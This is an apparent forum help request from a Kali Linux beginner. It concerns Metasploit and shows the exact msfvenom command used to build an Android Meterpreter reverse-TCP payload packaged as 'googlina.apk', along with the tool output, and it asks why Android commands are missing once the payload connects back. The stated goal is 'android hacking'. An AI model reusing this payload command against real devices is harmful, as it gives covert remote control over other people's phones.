Help Required with metasploit in kali linux

Oct 9, 2017 07:31 AM

Hi,

I'm New with Kali Linux and trying to create payload for android hacking.

I use below code for create payload:

root@Kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 LPORT=8495 R > googlina.apk

Result is below.

No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 8806 bytes

After installing payload in android phone payload getting connected to meterpreter but there is android command missing in meterpreter.

System : Gnome Version 3.25.92

Base System: Kali GNU/Linux Rolling 64-bit

Metasploit version: 4.16.6

Thanks in advance.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!